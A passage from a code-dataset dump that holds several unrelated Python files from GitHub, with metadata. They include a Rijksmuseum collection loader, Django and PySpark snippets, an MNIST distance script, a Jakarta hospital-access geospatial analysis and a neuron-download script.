requests.get(base_url).json()\n nl_url = \"https://www.rijksmuseum.nl/api/{}/collection/{}?key={}&format=json\".format(\"nl\", obj_id, apikey)\n nl_response = requests.get(nl_url).json()\n artObject = response[\"artObject\"]\n artObjectPage = response[\"artObjectPage\"]\n nl_artObject = nl_response[\"artObject\"]\n nl_artObjectPage = nl_response[\"artObjectPage\"]\n repository = session.query(Repository).filter_by(name=\"Rijksmuseum\").first()\n department = None\n if artObject[\"objectCollection\"]:\n department = session.query(Department).filter_by(repository_id=repository.id, name=artObject[\"objectCollection\"][0]).first()\n if department is None:\n new_department = Department(repository_id=repository.id, name=artObject[\"objectCollection\"][0])\n session.add(new_department)\n session.commit()\n artist_name = artObject[\"principalOrFirstMaker\"]\n artist = None\n if artist_name and artist_name is not \"anonymous\":\n artist = session.query(Artist).filter_by(name=artist_name).first()\n if not artist:\n for pm in artObject[\"principalMakers\"]:\n if pm[\"name\"] == artist_name:\n birth_date = pm[\"dateOfBirth\"]\n death_date = pm[\"dateOfDeath\"]\n artist = Artist(name=artist_name, birth_date=birth_date, death_date=death_date, bio=pm[\"biography\"])\n session.add(artist)\n session.commit()\n if artist is None:\n return\n else:\n artist = session.query(Artist).filter_by(name=\"Unknown\").one()\n webImage = artObject.get(\"webImage\", {})\n primary_image = None\n if webImage and \"url\" in webImage:\n primary_image = webImage[\"url\"]\n else:\n return\n new_item_dict = {\n \"api_id\": obj_id,\n \"repository_id\": repository.id,\n \"public_domain\": artObject.get(\"isPublicDomain\", True),\n \"primary_image\": primary_image,\n \"primary_image_height\": artObject.get(\"webImage\", {}).get(\"height\"),\n \"primary_image_width\": artObject.get(\"webImage\", {}).get(\"width\"),\n \"artist_id\": artist.id,\n \"obj_date\": artObject.get(\"dating\", {}).get(\"presentingDate\"),\n }\n if department:\n new_item_dict[\"department_id\"] = department.id\n new_item = Item(**new_item_dict)\n session.add(new_item)\n session.commit()\n en_language_dict = {\n \"item_id\": new_item.id,\n \"language\": \"EN\",\n \"title\": artObject.get(\"title\"),\n \"description\": artObjectPage.get(\"plaqueDescription\"),\n \"creditLine\": artObject.get(\"acquisition\", {}).get(\"creditLine\"),\n \"medium\": artObject.get(\"physicalMedium\"),\n \"audiofile\": artObjectPage.get(\"audioFile1\")\n }\n nl_language_dict = {\n \"item_id\": new_item.id,\n \"language\": \"NL\",\n \"title\": nl_artObject.get(\"title\"),\n \"description\": nl_artObject.get(\"description\"),\n \"creditLine\": nl_artObject.get(\"acquisition\", {}).get(\"creditLine\"),\n \"medium\": nl_artObject.get(\"physicalMedium\"),\n \"audiofile\": nl_artObjectPage.get(\"audioFile1\")\n }\n en_il = ItemLanguage(**en_language_dict)\n nl_il = ItemLanguage(**nl_language_dict)\n session.add(en_il)\n session.add(nl_il)\n session.commit()\n print(en_il.title)\n\nsearch()\n","repo_name":"dimdog/docent-backend","sub_path":"rijks_loader.py","file_name":"rijks_loader.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38754443958","text":"from pathlib import Path\nfrom pyspark.sql import SparkSession, Column, DataFrame\nfrom pyspark.sql.functions import col\nfrom pyspark.sql.types import *\n\nfrom exercises.catalog.catalog import file_to_frame\n\ndef clean(frame: 
DataFrame) -> DataFrame:\n # First, get the majority of columns “fixed”, i.e. their datatypes improved.\n df2 = (frame\n .withColumnRenamed('Code', 'Airport_Code')\n .withColumnRenamed('Description', 'Airport_Description')\n )\n return df2\n\nif __name__ == \"__main__\":\n target_dir = Path(__file__).parents[1] / \"target\"\n target_dir.mkdir(exist_ok=True)\n spark = SparkSession.builder.getOrCreate()\n frame = file_to_frame(\"airports\",spark)\n\n # frame.show(15)\n\n cleaned_frame=clean(frame)\n cleaned_frame.printSchema()\n cleaned_frame.write.mode(\"overwrite\").parquet(str(target_dir / \"cleaned_airports\"))","repo_name":"kdebaerdemaeker/pyspark_training","sub_path":"exercises/cleansers/clean_airports.py","file_name":"clean_airports.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13919433221","text":"import argparse\n\nimport cv2\nfrom mmdeploy_runtime import Restorer\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='show how to use sdk python api')\n parser.add_argument('device_name', help='name of device, cuda or cpu')\n parser.add_argument(\n 'model_path', help='path of SDK model dumped by model converter')\n parser.add_argument('image_path', help='path of an image')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n img = cv2.imread(args.image_path)\n\n restorer = Restorer(\n model_path=args.model_path, device_name=args.device_name, device_id=0)\n result = restorer(img)\n\n # convert to BGR\n result = result[..., ::-1]\n cv2.imwrite('output_restorer.bmp', result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"open-mmlab/mmdeploy","sub_path":"demo/python/image_restorer.py","file_name":"image_restorer.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"24929089497","text":"#Esta la cree yo!\nfrom django.contrib import admin\nfrom django.urls import path\nfrom Aplicaciones.Abogados.views import *\n\nurlpatterns = [\n path('',index, name = 'LogInPage'),\n path('listaContrato/',gestionContrato),\n path('crearusuario/',crearUsuario),\n path('registro/',paginaRegistro, name = 'RegisterPage'),\n path('miinicio/',paginaLogeo),\n\n]","repo_name":"Fckworld/abogadosLex","sub_path":"AbogadosLex/Aplicaciones/Abogados/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34137497435","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\nfrom sample.models import Book, Edition\n\nUser = get_user_model()\n\n\nclass CloneSignalsTestCase(TestCase):\n REPLICA_DB_ALIAS = \"replica\"\n databases = {\n \"default\",\n \"replica\",\n }\n\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.create(username=\"user\")\n\n def test_signals(self):\n name = \"New Book\"\n first_published_at = timezone.datetime(\n 1970, 1, 1, tzinfo=timezone.get_default_timezone()\n )\n book = Book.objects.create(\n name=name,\n created_by=self.user,\n slug=slugify(name),\n published_at=first_published_at,\n )\n self.assertEqual(book.published_at, first_published_at)\n edition = Edition.objects.create(seq=1, book=book)\n cloned_edition = edition.make_clone()\n self.assertEqual(cloned_edition.seq, 2)\n 
book.refresh_from_db()\n self.assertNotEqual(book.published_at, first_published_at)\n","repo_name":"tj-django/django-clone","sub_path":"model_clone/tests/test_clone_signals.py","file_name":"test_clone_signals.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"53"} +{"seq_id":"31747739156","text":"from time import sleep\r\nfrom winsound import Beep\r\nHour=0\r\nMin=0\r\nSec=0\r\nprint(\"\\n\")\r\ngreet=input(\"You will be asked to enter a timer by selecting hours, minutes, and seconds in order. Press enter to continue. \")\r\nwhile Hour==0:\r\n h=input(\"Select Hours: \")\r\n if h==0:\r\n break\r\n if h.isdigit():\r\n Hour=int(h)\r\n print(\"\\n\")\r\n break\r\n else:\r\n print(\"Enter a number\")\r\n\r\nwhile Min==0:\r\n m=input(\"Select Minutes: \")\r\n if m==0:\r\n break\r\n if m.isdigit():\r\n Min=int(m)\r\n print(\"\\n\")\r\n break\r\n else:\r\n print(\"Enter a number\")\r\n\r\nwhile Sec==0:\r\n s=input(\"Select Seconds: \")\r\n if s==0:\r\n break\r\n if s.isdigit():\r\n Sec=int(s)\r\n print(\"\\n\")\r\n break\r\n else:\r\n print(\"Enter a number\")\r\n\r\nprint(Hour,\":\",Min,\":\",Sec)\r\nsleep(Hour*3600+Min*60+Sec)\r\nprint(\"Time's up\\n\")\r\nBeep(1000,500)","repo_name":"lancedeal/Pet-Projects","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26913879092","text":"import urllib.request\nimport schedule\nimport time\n\ndef download_file(url, filename):\n urllib.request.urlretrieve(url, filename)\n\ndef job():\n url = 'https://webservices.mirea.ru/upload/iblock/603/t0wpe4tzyecbhx1wse7mpuv4ovhdnlr8/IKTST_4_k_osen_23.xlsx'\n filename = 'file.zip'\n download_file(url, filename)\n\n# Расписание выполнения задачи каждый день в 12:00\nschedule.every().day.at(\"23:59\").do(job)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)","repo_name":"PolyanskayaP/downloader","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31370219177","text":"\"\"\"\n Loads keras mnist dataset, calculates all between-picture distances and saves one dictionary per picture with the distances to all other pictures.\n To get the dictionary for a specific picture, hash the data of the picture with\n \n ```\n m = hashlib.sha3_256()\n m.update(img.data)\n key = m.hexdigest()\n ```\n\n and load the corresponding file with \n ```\n lookup = np.load(path.join(filepath, f\"{key}.npz\"), allow_pickle=True)[\"lookup\"].item(0)\n ```\n\n To look up a specific picture in the loaded dictionary use the binary digest as key, i.e.,\n\n ```\n m = hashlib.sha3_256()\n m.update(img.data)\n key = m.digest()\n lookup[key]\n ```\n\n Don't reuse m!\n\n\"\"\"\n#%%\nfrom datetime import datetime\nfrom hashlib import sha3_256 as hashfunc\nfrom os import getcwd, makedirs, path, sched_getaffinity\nimport cv2\n\nimport numpy as np\nfrom tensorflow.keras.datasets.mnist import load_data\nfrom tqdm.contrib.concurrent import process_map\n\nglobal X, batch_size, len_X, filepath\n\n#%%\nsize_subsample = 100000\n(x_train, _), (x_test, _) = load_data()\nX = np.concatenate((x_train, x_test))\nX = X.reshape((len(X), 28 * 28))[:size_subsample]\n\nmags = []\nfor img in X:\n dft = cv2.dft(np.float32(img),flags = cv2.DFT_COMPLEX_OUTPUT)\n dft_shift = np.fft.fftshift(dft)\n 
magnitude_spectrum_1 = 20*np.log(1+cv2.magnitude(dft_shift[:,:,0],dft_shift[:,:,1]))\n mags.append(magnitude_spectrum_1.reshape((28 * 28)))\n\n#%%\n#num_fake_data = 10\n#X = np.tile(np.arange(num_fake_data).reshape(num_fake_data, 1), (1, num_fake_data))\n\n#%%\ndef mat_mul(start_idx: int) -> None:\n\n # repeat batch to work on, i.e., [1,1,1,2,2,2]\n X_first = np.repeat(mags[start_idx : start_idx + batch_size], len_X, axis=0)\n # tile all images, i.e, [1,2,3,1,2,3]\n X_second = np.tile(mags, (batch_size, 1))\n # distance calculation, change if needed\n X_dist = np.sqrt(np.sum(np.square(X_first - X_second), axis=1))\n X_dist = X_dist.astype(np.float16)\n\n # loop over all pictures in the batch\n # lookup range helpful, when the last batch is not full\n lookup_range = batch_size if start_idx + batch_size < len_X else len_X - start_idx\n\n X_first.flags.writeable = False\n X_second.flags.writeable = False\n\n for idx in range(lookup_range):\n m = hashfunc()\n m.update(X_first[idx * len_X].data)\n main_hash = m.hexdigest()\n\n tmp = {}\n # loop over all pictures\n for jdx in range(len_X):\n m = hashfunc()\n m.update(X_second[idx * len_X + jdx].data)\n tmp_hash = m.digest()\n tmp[tmp_hash] = X_dist[idx * len_X + jdx]\n\n np.savez_compressed(path.join(filepath, f\"{main_hash}.npz\"), lookup=tmp)\n\n del X_first, X_second, X_dist, tmp, main_hash, tmp_hash\n\n\n#%%\nbatch_size = 2\nnum_processes = len(sched_getaffinity(0))\nlen_X = len(X)\nall_idx = np.arange(0, len_X, batch_size)\n\n#filepath = path.join(getcwd(), \"test_dicts\")\nfilepath = path.join(\"/home/ubuntu/hannah_distances\", \"partial_dicts\")\nmakedirs(filepath, exist_ok=True)\n\nstart = datetime.now()\n\n# the same as using multiprocessing, but shows progress bar\n# with multiprocessing.Pool(num_processes) as p:\n# p.map(mat_mul, all_idx)\nprocess_map(mat_mul, all_idx, max_workers=num_processes)\n\nstop = datetime.now()\n\nprint(f\"Overall calculation took {stop - start}\", flush=True)\n\n\n# # %%\n# lookup = np.load(\n# path.join(\n# filepath,\n# \"d609e40c13512f409e8075f9da4a72aef6822ad14815b601eac3fc339db2a00a.npz\",\n# ),\n# allow_pickle=True,\n# )[\"lookup\"].item(0)","repo_name":"SAP-samples/security-research-identifiability-in-dpdl","sub_path":"dpa/projects/mnist/heuristics/distances_Fourier.py","file_name":"distances_Fourier.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30647297709","text":"# -*- coding: utf-8 -*-\nfrom __init__ import DATA_DIR, SETTINGS\nfrom ma_jakarta.scripts.data_preprocessing import admin_border\nfrom os import path, mkdir\nimport geopandas as gpd\nimport pandas as pd\nimport numpy as np\nfrom shapely.geometry import Polygon, mapping, LineString, shape\nimport sys\nimport logging\nfrom shapely.ops import unary_union, polygonize\nfrom rasterstats import zonal_stats\nfrom area import area\n\n\ndef add_capacity_data(scenario, amenity_type, range_value):\n \"\"\"Adds health capacity attributes to isochrones\"\"\"\n iso_layer = None\n\n # load isochrone data and sort by amenity type and range value\n if scenario == 'normal':\n iso_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['isochrones'][scenario]))\n elif scenario == 'flooded':\n iso_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['isochrones']['pre_' + scenario]))\n iso_hosp = iso_layer.loc[iso_layer.amenity == amenity_type].copy()\n iso_hosp_value = iso_hosp.loc[iso_hosp.value == range_value].copy()\n\n # load health amenity data and sort 
by amenity type\n hs_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['amenities'][scenario]))\n # osm data id = id_1; hot data id = osm_id\n id_name = ['id_1' if 'id_1' in hs_layer else 'osm_id'][0]\n hs_hosp = hs_layer.loc[hs_layer.amenity == amenity_type].copy()\n hs_hosp = hs_hosp.rename({id_name: \"amenity_id\"}, axis=1)\n\n # merge data\n data_merged = pd.merge(hs_hosp, iso_hosp_value, on='amenity_id')\n data_merged = data_merged.rename({\"geometry_y\": \"geometry\"}, axis=1)\n\n if 'cap_int' in data_merged.columns:\n data_selected = data_merged[['geometry', 'amenity_id', 'cap_int']]\n else:\n print(\"Information: ma_jakarta.scripts.analysis.supply_demand analysis.add_capacity_data: no capacity data present.\\nIf available needs to be present in field cap_int. Assiging 0 to cap_int.\")\n data_selected = data_merged[['geometry', 'amenity_id']]\n data_selected.insert(2, 'cap_int', 0, True)\n\n return data_selected\n\n\ndef create_boundaries(input_layer):\n \"\"\"Generates overlay layer containing all possible polygons of overlapping isochrones.\n It considers only the isochrone boundaries, not the number of overlapping polygons\"\"\"\n\n # generate linestring layer containing the exterior coordinates of the isochrone boundaries\n boundaries = [LineString(list(shape(geom).exterior.coords)) for geom in input_layer['geometry']]\n # dissolve linestring connections to result in single linestring segments\n unioned_data = unary_union(boundaries)\n # generate polygons using linestring segments as boundary -> isochrone fragments\n polygonized_data = [geom for geom in polygonize(unioned_data)]\n\n layer_list = []\n for i, pol in enumerate(polygonized_data):\n layer_list.append(pd.DataFrame.from_dict({'geometry': mapping(pol)['coordinates']}))\n\n concat_df = pd.concat([layer for layer in layer_list]).reset_index()\n concat_df['geometry'] = [Polygon(g) for g in concat_df['geometry']]\n\n result_geodf = gpd.GeoDataFrame(concat_df, geometry='geometry')\n\n return result_geodf\n\n\ndef intersect_overlap(scenario, iso_capacities, iso_boundaries):\n \"\"\"Amount of overlapping isochrone fragments result in specific available health capacity within each area\"\"\"\n geom_list = []\n counter = 0\n\n # for each polygon respectively isochrone fragment\n for overlay_idx in range(len(iso_boundaries)):\n\n original_idx_overlapping = 0\n cap_int_value = 0 # counter to sum up cumulative health capacity for overlapping areas\n overlay_idx_geom = iso_boundaries.geometry[overlay_idx]\n\n # for each isochrone\n for original_idx in range(len(iso_capacities)):\n\n original_idx_geom = iso_capacities.geometry[original_idx]\n\n if overlay_idx_geom.intersects(original_idx_geom):\n intersected_geom = overlay_idx_geom.intersection(original_idx_geom)\n\n if intersected_geom.geom_type == 'Polygon':\n\n # sum up bed capacity per geometry\n cap_int_value += iso_capacities.cap_int[original_idx]\n counter += 1\n original_idx_overlapping = original_idx_overlapping + 1\n\n if len(geom_list) == 0:\n geom_list.append([counter, original_idx_overlapping, cap_int_value, intersected_geom])\n else:\n # drop geometries with an area size smaller than 1m²\n if area(mapping(intersected_geom)) > 0.000009039:\n # drop overlapping rows\n if intersected_geom.almost_equals(geom_list[-1][3]):\n del geom_list[-1]\n geom_list.append([counter, original_idx_overlapping, cap_int_value, intersected_geom])\n else:\n geom_list.append([counter, original_idx_overlapping, cap_int_value, intersected_geom])\n\n df = pd.DataFrame(geom_list, 
columns=['counter', 'overlap', 'cap_int', 'geometry'])\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n if scenario != 'normal':\n # remove flooded areas\n flood_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['flood']['preprocessed']))\n result_geodf = gpd.overlay(result_geodf, flood_layer, how='symmetric_difference')\n\n # drop entries with missing and empty geometries\n result_geodf = result_geodf[~(result_geodf['geometry'].is_empty | result_geodf['geometry'].isna())]\n\n return result_geodf\n\n\ndef drop_similar_entries(poly_layer=None):\n \"\"\"Removes duplicate geometries\"\"\"\n poly_list = []\n\n # select still overlapping geometries\n for poly_idx in range(len(poly_layer[:-1])):\n # select if population count and area size is almost the same\n if poly_layer['pop'][poly_idx] == poly_layer['pop'][poly_idx + 1] and \\\n round(poly_layer['area'][poly_idx], 7) == round(poly_layer['area'][poly_idx + 1], 7):\n poly_list.append(poly_layer['counter'][poly_idx])\n\n # drop rows from df\n df = poly_layer[~poly_layer['counter'].isin(poly_list)]\n\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n return result_geodf\n\n\ndef calculate_fragment_values(pop_raster, poly_layer=None, add_columns=False):\n \"\"\"Calculates population sum per isochrone.\"\"\"\n pop_data = []\n\n for poly_idx, poly_cap, poly_geom in zip(poly_layer['counter'], poly_layer['cap_int'], poly_layer['geometry']):\n feature = gpd.GeoSeries([poly_geom]).to_json()\n pop_stats = zonal_stats(feature, pop_raster, stats=['sum']) # calculate population for given area\n poly_area = area(mapping(poly_geom)) / 1e+6 # in kilometer\n pop_data.append([poly_idx, poly_cap, pop_stats[0]['sum'], poly_area, poly_geom])\n\n df = pd.DataFrame(pop_data, columns=['counter', 'cap_int', 'pop', 'area', 'geometry'])\n df['pop'].fillna(0, inplace=True)\n\n if add_columns is True:\n df['cap_pop'] = (df['cap_int']/df['pop']) * 100000\n df['pop_area'] = df['pop']/df['area'] # population density\n df['cap_dens'] = df['cap_int'] / df['pop_area']\n\n df = df.replace([np.inf, -np.inf], np.nan)\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n return result_geodf\n\n\ndef normal_flooded_union(normal_layer, scenario_layer):\n \"\"\"Applies union to receive all possible geometries\"\"\"\n\n # drop entries with missing and empty geometries and spply buffer around each geometry\n normal_cleaned = normal_layer[~(normal_layer['geometry'].is_empty | normal_layer['geometry'].isna())]\n normal_cleaned = normal_cleaned[['counter', 'cap_int', 'geometry']]\n normal_cleaned.geometry = normal_cleaned.geometry.buffer(0.000001).copy()\n\n # drop entries with missing and empty geometries\n scenario_cleaned = scenario_layer[~(scenario_layer['geometry'].is_empty | scenario_layer['geometry'].isna())]\n normal_cleaned = normal_cleaned[['counter', 'cap_int', 'geometry']]\n normal_cleaned.geometry = normal_cleaned.geometry.buffer(0.000001).copy()\n\n # apply union overlay\n result_geodf = gpd.overlay(normal_cleaned, scenario_cleaned, how='union')\n\n return result_geodf\n\n\ndef calculate_column_change(pop_raster, poly_layer):\n \"\"\"Calculates flood impact per isochrone for each column.\"\"\"\n pop_data = []\n poly_layer = poly_layer[['counter_1', 'cap_int_1', 'counter_2', 'cap_int_2', 'geometry']]\n\n for poly_idx_n, poly_cap_n, poly_idx_2, poly_cap_2, poly_geom in zip(poly_layer['counter_1'],\n poly_layer['cap_int_1'],\n poly_layer['counter_2'],\n poly_layer['cap_int_2'],\n poly_layer['geometry']):\n feature = 
gpd.GeoSeries([poly_geom]).to_json()\n # drop geometries with an area size smaller than 1m²\n if area(mapping(poly_geom)) > 0.000009039:\n # calculate population for given area\n pop_stats = zonal_stats(feature, pop_raster, stats=['sum'])\n poly_area = area(mapping(poly_geom)) / 1e+6 # in kilometer\n pop_data.append([poly_idx_n, poly_cap_n, poly_idx_2, poly_cap_2, pop_stats[0]['sum'], poly_area, poly_geom])\n\n df = pd.DataFrame(pop_data, columns=['counter_1', 'cap_int_1', 'counter_2', 'cap_int_2', 'pop', 'area', 'geometry'])\n df.dropna(subset=['pop'])\n\n df['pop_area'] = df['pop'] / df['area'] # population density\n df['cap_pop'] = (df['cap_int_1'] / df['pop']) * 100000\n df['cap_dens'] = df['cap_int_1'] / df['pop_area']\n df['cap_dens_2'] = df['cap_int_2'] / df['pop_area']\n df['cap_dens_d'] = df['cap_dens_2'] - df['cap_dens']\n\n df = df.replace([np.inf, -np.inf], np.nan)\n result_geodf = gpd.GeoDataFrame(df, geometry='geometry')\n\n return result_geodf\n\n\ndef stats(access_result_geodf, column_name, percentile_value):\n \"\"\"Calculates percentile value; Useful for data interpretation and visualisation \"\"\"\n df_np = access_result_geodf[column_name].to_numpy()\n\n print(str(percentile_value), ' percentile:', np.nanpercentile(df_np, int(percentile_value)))\n print('Std.:', np.std(df_np))\n print('Std., ignoring NaNs:', np.nanstd(df_np))\n print('Variance, ignoring NaNs:', np.nanvar(df_np))\n print('Mean:', np.mean(df_np))\n print('Mean, ignoring NaNs:', np.nanmean(df_np))\n\n\nif __name__ == '__main__':\n\n scenario_name = None\n analysis_part = None\n amenity_type_input = 'hospital'\n time_range = 300 # 5 minutes\n pop_layer = path.join(DATA_DIR, SETTINGS['population']['extract'])\n iso_boundaries_layer = None\n column_name_input = None\n percentile_value_input = None\n\n try:\n analysis_part = str(sys.argv[1])\n except IndexError:\n logging.error('Please provide a analysis_part, e.g., analysis or stats.')\n sys.exit(1)\n print(analysis_part)\n if analysis_part == 'analysis':\n\n try:\n scenario_name = str(sys.argv[2])\n except IndexError:\n logging.error('Please provide one scenario name, e.g., normal or flooded.')\n sys.exit(1)\n\n try:\n amenity_type_input = str(sys.argv[3])\n time_range = int(sys.argv[4])\n except IndexError:\n pass\n\n if not path.exists(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'])):\n mkdir(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results']))\n print('Directory', path.join(DATA_DIR, SETTINGS['supply_demand']['path_results']), 'created.')\n\n # add health data to isochrones\n iso_cap_layer = add_capacity_data(scenario_name, amenity_type_input, time_range)\n # create overlay layer\n iso_boundaries_layer = create_boundaries(iso_cap_layer)\n # calculate values of overlapping areas\n cum_overlap_layer = intersect_overlap(scenario_name, iso_cap_layer, iso_boundaries_layer)\n\n # add additional information like population amount\n area_lyr = calculate_fragment_values(pop_layer, cum_overlap_layer, False)\n cleaned_lyr = drop_similar_entries(area_lyr)\n supply_demand_geodf = calculate_fragment_values(pop_layer, cleaned_lyr, True)\n\n # save data\n supply_demand_geodf.to_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand'][scenario_name]), driver='ESRI Shapefile')\n print(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'], SETTINGS['supply_demand'][scenario_name]),\n 'saved')\n\n if scenario_name == 'flooded':\n\n supply_demand_normal = gpd.read_file(path.join(DATA_DIR, 
SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['normal']))\n city_layer = gpd.read_file(path.join(DATA_DIR, SETTINGS['city_border']['preprocessed']))\n\n # calculate flood impact\n union_result = normal_flooded_union(supply_demand_normal, supply_demand_geodf)\n impact_result = calculate_column_change(pop_layer, union_result)\n # calculate city difference to receive only data within the city\n impact_result_city = admin_border.border_intersect(city_layer, impact_result)\n\n # save impact data\n impact_result_city.to_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['impact']), driver='ESRI Shapefile')\n print(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'], SETTINGS['supply_demand']['impact']),\n 'saved')\n\n elif analysis_part == 'stats':\n print(sys.argv[2])\n try:\n column_name_input = str(sys.argv[2])\n except IndexError:\n logging.error('Please provide a valid column name of the processed file:',\n path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['flooded']))\n sys.exit(1)\n\n try:\n percentile_value_input = sys.argv[3]\n except IndexError:\n logging.error('Please provide a percentile between 0 and 100.')\n sys.exit(1)\n\n # load processed impact file\n impact_geodf = gpd.read_file(path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['flooded']), driver='ESRI Shapefile')\n\n # check if column exists in input file\n if column_name_input not in impact_geodf:\n print('Please provide a valid column name of the processed file:',\n path.join(DATA_DIR, SETTINGS['supply_demand']['path_results'],\n SETTINGS['supply_demand']['flooded']))\n sys.exit()\n\n # run percentile function\n stats(impact_geodf, column_name_input, percentile_value_input)\n","repo_name":"GIScience/Jakarta_Thesis_Klipper","sub_path":"ma_jakarta/scripts/analysis/supply_demand.py","file_name":"supply_demand.py","file_ext":"py","file_size_in_byte":15232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37179779785","text":"import numpy as np\n\ndef bot_d2h_dx2(x, s):\n\t\"\"\"\n\tHessian of the measurement function in BOT-demo.\n\n\tCopyright (C) 2007 Jouni Hartikainen\n\t\n\tThis software is distributed under the GNU General Public \n\tLicence (version 2 or later); please refer to the file \n\tLicence.txt, included with the software, for details.\n\t\"\"\"\n\n\t# Space for Hessians. Note that we need a Hessian for\n\t# each dimension in the measurement space, that is we need\n\t# a Hessian for each sensor in this case. \n\n\ts_ = s.shape[1]\n\tx_ = x.shape[0] \n\n\tdY = np.zeros((s_,x_,x_))\n\t\n\t# Loop through sensors.\n\tfor i in range(s_):\n\t\t# Derivative twice wrt. x\n\t\tdx2 = -2*(x[0]-s[0,i]) / ((x[0]-s[0,i])**2+(x[1]-s[1,i])**2)**2\n\t\t# Derivative twice wrt. y \n\t\tdy2 = -2*(x[1]-s[1,i]) / ((x[0]-s[0,i])**2+(x[1]-s[1,i])**2)**2\n\t\t# Derivative wrt. 
x and y\n\t\tdxdy = ((x[1]-s[1,i])**2-(x[0]-s[0,i])**2) / ((x[0]-s[0,i])**2+(x[1]-s[1,i])**2)**2\n\t\tdh = np.array([[dx2, dxdy, 0, 0],\n\t\t\t\t\t [dxdy, dy2, 0, 0],\n\t\t\t\t\t [0, 0, 0, 0],\n\t\t\t\t\t [0, 0, 0, 0]])\n\t\tdY[i] = dh\n\treturn dY","repo_name":"sursu/Bayesian-Filtering","sub_path":"EKFUKF_Py/demo/bot_demo/bot_d2h_dx2.py","file_name":"bot_d2h_dx2.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"3299431648","text":"import datetime\nimport time\nfrom pathlib import Path\nfrom pickle import dump, load\n\nimport numpy as np\nimport pymaid\nfrom requests.exceptions import ChunkedEncodingError\nfrom src.data import load_maggot_graph\nfrom src.pymaid import start_instance\nimport matplotlib.pyplot as plt\n\nout_path = Path(\"maggot_models/experiments/pull_neurons/outs\")\n\n\nt0 = time.time()\nstart_instance()\n\nmg = load_maggot_graph()\nnodes = mg.nodes\nids = [int(i) for i in nodes.index[:100]]\n\nbatch_size = 100\nmax_tries = 5\nn_batches = int(np.floor(len(ids) / batch_size))\nif len(ids) % n_batches > 0:\n n_batches += 1\nprint(f\"Batch size: {batch_size}\")\nprint(f\"Number of batches: {n_batches}\")\nprint(f\"Number of neurons: {len(ids)}\")\nprint(f\"Batch product: {n_batches * batch_size}\\n\")\n\ni = 0\ncurrtime = time.time()\nnl = pymaid.get_neuron(\n ids[i * batch_size : (i + 1) * batch_size], with_connectors=False\n)\nprint(f\"{time.time() - currtime:.3f} seconds elapsed for batch {i}.\")\nfor i in range(1, n_batches):\n currtime = time.time()\n n_tries = 0\n success = False\n while not success and n_tries < max_tries:\n try:\n nl += pymaid.get_neuron(\n ids[i * batch_size : (i + 1) * batch_size], with_connectors=False\n )\n success = True\n except ChunkedEncodingError:\n print(f\"Failed pull on batch {i}, trying again...\")\n n_tries += 1\n print(f\"{time.time() - currtime:.3f} seconds elapsed for batch {i}.\")\n\nprint(\"\\nPulled all neurons.\\b\")\n\n\nprint(\"Pickling...\")\ncurrtime = time.time()\n\nwith open(out_path / \"neurons.pickle\", \"wb\") as f:\n dump(nl, f)\nprint(f\"{time.time() - currtime:.3f} seconds elapsed.\")\n\nelapsed = time.time() - t0\ndelta = datetime.timedelta(seconds=elapsed)\nprint(\"----\")\nprint(f\"Script took {delta}\")\nprint(f\"Completed at {datetime.datetime.now()}\")\nprint(\"----\")\n\nwith open(out_path / \"neurons.pickle\", \"rb\") as f:\n nl = load(f)\n\nnl.plot2d()\nplt.show()","repo_name":"neurodata/maggot_models","sub_path":"experiments/pull_neurons/pull_neurons.py","file_name":"pull_neurons.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20123923602","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport json\nimport traceback\n\nfrom pypykatz import logger\nfrom pypykatz.commons.common import UniversalEncoder\n\n\n\nclass 